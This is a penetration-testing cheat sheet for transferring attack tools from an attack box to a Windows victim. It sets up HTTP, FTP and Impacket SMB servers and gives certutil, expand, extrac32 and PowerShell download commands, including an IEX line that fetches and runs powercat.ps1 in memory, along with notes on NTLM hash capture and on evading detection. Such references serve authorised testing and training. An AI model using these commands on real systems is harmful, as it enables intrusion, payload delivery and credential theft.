Transfer files – Windows
Several methods are described here for transferring files between a Windows victim and the attack box.
Start HTTP Server on Attack box
Start HTTP Server via Python module (Python 2; on Python 3 the same server is python3 -m http.server 80):
python -m SimpleHTTPServer 80
The server shares the current working directory, and anyone who can reach the port can list and download every file in it, so start it from a directory that holds only the tools you intend to transfer.
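A small wrapper around the same standard-library server, added here as an example (it is not code from the original page): it serves one directory, logs every download together with the client address, so you can see which host fetched which tool, and prints the hash of each shared file for the integrity check after the transfer. The directory, port and file names are placeholders.

```python
"""Minimal HTTP file server for the attack box, with request logging and a
checksum helper. Added example, not code from the original page: it wraps the
standard library http.server module (the same server `python -m http.server`
starts) so that every download is recorded with the client address, and
exposes the hash the operator compares against after the transfer.
Directory, port and file names are placeholders."""
import hashlib
import http.server
import os
import socketserver
import threading


def file_digest(path, algo="md5"):
    """Hex digest of a file. Compare it with the hash computed on the victim
    after the transfer (certutil -hashfile <file> MD5 or Get-FileHash)."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class LoggingHandler(http.server.SimpleHTTPRequestHandler):
    """Serve files from one directory and record who fetched what."""

    def __init__(self, *args, directory=None, log=None, **kwargs):
        # Must be set before super().__init__(), which handles the request
        # synchronously and therefore calls log_message() from inside it.
        self._log = log if log is not None else []
        super().__init__(*args, directory=directory, **kwargs)

    def log_message(self, fmt, *args):
        entry = "%s %s" % (self.client_address[0], fmt % args)
        self._log.append(entry)
        print(entry)


class _Server(socketserver.ThreadingTCPServer):
    allow_reuse_address = True  # restart immediately after Ctrl-C


def serve_directory(directory, host="0.0.0.0", port=0, log=None):
    """Start the server in a background thread and return (server, port).
    port=0 lets the OS choose a free port; in the field use 80 or 8000 as in
    the certutil and PowerShell examples on this page."""
    def handler(*args, **kwargs):
        return LoggingHandler(*args, directory=directory, log=log, **kwargs)

    srv = _Server((host, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    share = os.getcwd()
    srv, port = serve_directory(share, port=8000)
    # Print the hashes up front so they can be compared on the victim later.
    for name in sorted(os.listdir(share)):
        if os.path.isfile(name):
            print("%s  %s" % (file_digest(name), name))
    print("serving %s on port %d, Ctrl-C to stop" % (share, port))
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it from the directory that holds the tools; the printed digests are what you compare against certutil -hashfile or Get-FileHash on the victim once the download has completed.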
Start FTP Server on Attack box
Start FTP via pyftpdlib:
# Install pyftpdlib
apt-get install python-pyftpdlib
# Anonymous, read-only FTP server on port 2121 sharing the current directory
python -m pyftpdlib -p 2121
# -w allows anonymous write access: use it only while you need uploads, since anyone on the network can then write into the shared directory
python -m pyftpdlib -w -p 2121
Start SMB Server on Attack box
Start SMB service via Impacket's smbserver.py:
https://github.com/CoreSecurity/impacket
To launch a simple SMB server on port 445, specify a share name and the path you want to share:
python smbserver.py TMP /root/shells
The script takes care of the configuration, binds to 445 (which needs root, and the port must not already be held by Samba), and accepts any authentication. It also prints the NTLM challenge-response hashes of every system that connects, which can be cracked or relayed later. Caveat: modern Windows does not speak SMB1 and, since Windows 10, blocks unauthenticated guest access to SMB2 shares by default, so add -smb2support and, if the client still refuses the share, set credentials with -username and -password and use those when mapping the share from the victim.
certutil
certutil -urlcache -split -f "http://10.10.xx.xx:8000/nc.exe" "C:\Users\security\tmp\nc.exe"
certutil is a signed Microsoft binary, but its use as a downloader is well known and commonly flagged by AV and EDR. -split writes the fetched file to disk, and -urlcache leaves a copy in the user's URL cache (certutil -urlcache * delete clears it afterwards).
expand
With the Impacket SMB share running on Kali (see above), run from the victim:
expand \\kali-ip\TMP\file.exe .
expand copies the file into the current directory (the trailing .). Note: a low-privilege user typically has write access to C:\Windows\Tasks or C:\Windows\Temp, which makes them convenient drop locations.
extrac32
extrac32 /Y /C \\10.11.xx.xxx\TMP\MS14-058.exe C:\Windows\Temp\MS14058.exe
/C copies the source file as-is rather than extracting a cabinet, and /Y overwrites the destination without prompting.
Powershell
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.7:8000/Invoke-SMBExec.ps1", "C:\Users\Administrator\test2\Invoke-SMBExec.ps1")
Invoke-WebRequest "http://10.10.14.7:8000/Invoke-SMBExec.ps1" -OutFile "C:\Users\security\tmp\Invoke-SMBExec.ps1"
Both write the file to disk; the destination directory must already exist, and Invoke-WebRequest needs PowerShell 3.0 or later.
Powershell Download and Execute
IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.xx.xx/powercat.ps1')
This runs the script straight from memory without writing it to disk; on PowerShell 5 and later the content is still inspected by AMSI and recorded by script block logging if that is enabled.
Base64
Examples. Encode on one side, paste the output on the other, and decode it back into a binary:
cat ncat | base64 -w 0
echo -n (paste) | base64 -d > ncat
Or via an intermediate file:
cat /bin/nc | base64 -w 0 > nc.b64
cat nc.b64 | base64 -d > nc
-w 0 disables line wrapping so the whole blob is a single line, which is easiest to paste. For larger files split it into several pastes, since a single command line has length limits (cmd.exe stops at 8191 characters) and a truncated paste decodes to a broken binary.
md5 check file integrity after transfer.
Hash the original on the attack box:
md5sum /bin/nc
7a32c9739cc63ed983ae01af2577c01c /bin/nc
Then hash the transferred copy and compare; a mismatch means the paste was truncated or corrupted:
chmod +x nc
md5sum nc
7a32c9739cc63ed983ae01af2577c01c nc
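The two steps above (base64 transfer, then the md5 comparison) combined into one tool, as an added example that is not code from the original page: it cuts the base64 into lines short enough to paste in chunks, strips the line endings and stray whitespace that terminals add when the text is pasted back, and refuses to emit the file unless the MD5 matches the digest recorded before the transfer, so a truncated paste is caught instead of producing a corrupt binary. The script and file names are placeholders.

```python
"""Base64 transfer with an integrity check. Added example, not code from the
original page: it packages a binary as base64 lines short enough to paste
into a shell one chunk at a time, reassembles them on the other side, and
refuses the result unless the MD5 matches the value computed before the
transfer. File names on the command line are placeholders."""
import base64
import hashlib
import sys

# Lines this short survive copy/paste and stay far below cmd.exe's 8191-char limit.
LINE_LEN = 76


def pack(data, line_len=LINE_LEN):
    """Return (md5_hex, base64_lines) for the bytes to transfer. The digest is
    what you write down before pasting; the lines are what you paste."""
    digest = hashlib.md5(data).hexdigest()
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + line_len] for i in range(0, len(b64), line_len)]
    return digest, lines


def unpack(lines, expected_md5):
    """Reassemble pasted lines into the original bytes. Strips the CR/LF and
    stray whitespace that terminals add, and raises ValueError if the text is
    not valid base64 or its MD5 differs from expected_md5 (truncated paste)."""
    cleaned = "".join("".join(line.split()) for line in lines)
    try:
        data = base64.b64decode(cleaned, validate=True)
    except ValueError as e:  # binascii.Error is a ValueError subclass
        raise ValueError("pasted text is not valid base64: %s" % e)
    got = hashlib.md5(data).hexdigest()
    if got != expected_md5:
        raise ValueError("md5 mismatch: expected %s, got %s" % (expected_md5, got))
    return data


if __name__ == "__main__":
    # pack:   python3 b64xfer.py pack /bin/nc > nc.b64       (md5 printed on stderr)
    # unpack: python3 b64xfer.py unpack nc.b64 <md5> > nc
    if len(sys.argv) == 3 and sys.argv[1] == "pack":
        with open(sys.argv[2], "rb") as f:
            digest, lines = pack(f.read())
        sys.stderr.write("md5 %s\n" % digest)
        sys.stdout.write("\n".join(lines) + "\n")
    elif len(sys.argv) == 4 and sys.argv[1] == "unpack":
        with open(sys.argv[2]) as f:
            data = unpack(f.readlines(), sys.argv[3])
        sys.stdout.buffer.write(data)
    else:
        sys.exit("usage: pack <file> | unpack <file.b64> <md5>")
```

When the receiving side is the Windows victim rather than another Linux box, the same wrapped lines can be decoded with certutil -decode nc.b64 nc.exe and checked with certutil -hashfile nc.exe MD5 (or Get-FileHash -Algorithm MD5 in PowerShell); compare the result against the digest pack printed before you pasted.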
See https://lolbas-project.github.io/ for legitimate native Windows binaries (such as certutil, expand and extrac32 above) that an attacker can abuse to download files and bypass local security restrictions.